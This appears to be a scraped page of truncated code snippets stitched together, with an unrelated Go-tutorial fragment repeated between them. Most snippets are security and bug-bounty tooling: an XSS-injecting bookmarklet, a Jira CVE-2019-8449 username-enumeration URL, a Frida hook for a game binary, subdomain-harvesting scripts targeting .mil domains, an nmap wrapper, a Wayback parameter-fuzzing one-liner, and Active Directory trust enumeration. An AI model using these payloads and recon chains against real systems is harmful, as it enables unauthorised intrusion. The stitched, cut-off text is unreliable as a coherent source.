This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0) |
import xml.etree.ElementTree as ET | |
import urllib | |
import base64 | |
import math | |
import sys | |
import re | |
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
# python burplist.py burprequests.xml | |
# output is saved to wordlist.txt |
This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== |
import { log } from "./logger"; | |
import { AssertionError } from "assert"; | |
const libil2cpp = Process.getModuleByName("libil2cpp.so"); | |
const libil2cppb = libil2cpp.base; | |
const playerinfo_serialize = libil2cppb.add(0x6c2e30); | |
const playerinfo_deserialize = libil2cppb.add(0x6c316c); | |
console.log("Starting script.."); | |
function readString(pointr:NativePointer){ |
# Copyright 2017-2020 Jeff Foley. All rights reserved. | |
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
# Should results only be collected passively and without DNS resolution? Not recommended. | |
#mode = passive | |
mode = active | |
# The directory that stores the Cayley graph database and other output files | |
# The default for Linux systems is: $HOME/.config/amass | |
#output_directory = amass |
require 'open3' | |
require 'net/http' | |
require 'nokogiri' | |
require 'parallel' | |
# Requires the nokogiri gem (`gem install nokogiri`), the parallel gem (`gem install parallel`) and the psql client for PostgreSQL. | |
def crtsh | |
Open3.pipeline_rw 'psql -t -h crt.sh -p 5432 -U guest certwatch', "sed -e 's:^ *::g' -e 's:^*\\.::g' -e '/^$/d'", 'sort -u', "sed -e 's:*.::g'" do |i, o, t| | |
i.write("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.mil'));") |
#!/bin/bash | |
# Use nmap to find open ports fast and then run a detailed scans on the returned ports | |
if [ -z "$1" ] | |
then | |
echo "__nmap_fast__" | |
echo "Usage: ./nmap_fast TARGET_HOSTNAME" | |
fi | |
TARGET_HOSTNAME=$1 |
curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |